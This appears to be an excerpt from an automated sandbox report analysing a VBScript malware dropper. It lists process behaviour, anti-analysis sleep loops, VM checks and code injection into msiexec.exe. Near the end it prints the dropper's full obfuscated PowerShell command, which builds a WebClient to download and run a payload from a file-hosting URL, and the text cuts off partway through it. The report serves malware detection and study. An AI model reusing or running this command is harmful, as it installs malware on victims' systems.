              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Pseudogeometry.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4788Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5121Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6893Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2643Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 1288Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep count: 65 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: PING.EXE, 00000007.00000002.1286525521.0000022984667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
              Source: wscript.exe, 00000000.00000002.1292419466.00000256F9CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1289985584.00000256F9CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
              Source: wscript.exe, 00000000.00000003.1280362346.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282555662.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281066678.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280887480.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.AJj
              Source: wscript.exe, 00000000.00000003.1280362346.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282555662.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281066678.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290600846.00000256FBB04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280887480.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282406624.00000256FBB08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281222658.00000256FBAE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000009.00000002.1547484456.0000013AE70E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7424.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3930000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ 